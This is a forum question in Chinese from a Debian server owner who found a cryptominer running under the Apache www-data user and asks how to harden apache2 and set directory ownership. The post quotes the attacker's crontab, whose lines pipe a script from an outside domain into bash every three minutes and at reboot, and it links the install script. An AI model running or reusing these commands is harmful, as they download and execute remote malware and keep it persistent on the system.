如何在 Debian 上保护/强化 apache2？

最近，我通过使用 htop 命令找出占用整个资源（CPU 和内存）的内容，在我的 Debian 10 服务器中发现了挖矿程序。显然所有恶意进程都在 www-data 用户下运行。我杀死了这些进程并清空了用户 www-data crontab。目前为止还没有回来，但我想它会回来的。现在我需要有关保护/强化 apache2 的帮助，因为我认为矿工是通过 apache2 安装的，因为这些进程在用户 www-data 下运行。

用户 www-data crontab 有以下内容：

root@***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
@reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash

http://repo1.riticalnumeric.tech/scripts/cnc/install内容：https://pastebin.com/Q049ZZtW

所以我所做的是：

touch /etc/cron.allow

并且仅在该文件中列出“root”，因此非 root 用户将无法添加任何 cron 作业。

但我认为这还不够......矿工如何能够将作业添加到用户 www-data crontab 中？

所以，我认为矿工能够在 /var/www/site 中编写/执行恶意脚本

/var/www 属于 root:root

但是 /var/www/site 、 /var/www/site2 等由 www-data:www-data 所有 - 所以 Laravel 等可以作为 Web 服务器能够读取/写入/执行文件/目录。

我注意到：

文件权限

网页内容

由于历史原因，Apache 以名为 www-data 的用户运行。这有点误导，因为通常情况下，?DocumentRoot (/var/www) 中的文件不应由该用户拥有或写入。要查找具有错误权限的文件...

https://wiki.debian.org/Apache/Hardening

我是否正确理解 /var/www/site、/var/www/site2 等不应属于 www-data:www-data？

保护/强化 apache2 的推荐方法是什么？

当 Web 文件不属于 www-data:www-data 时，Laravel 等将无法工作，因为 Web 服务器无法读取/归档/执行 Web 文件...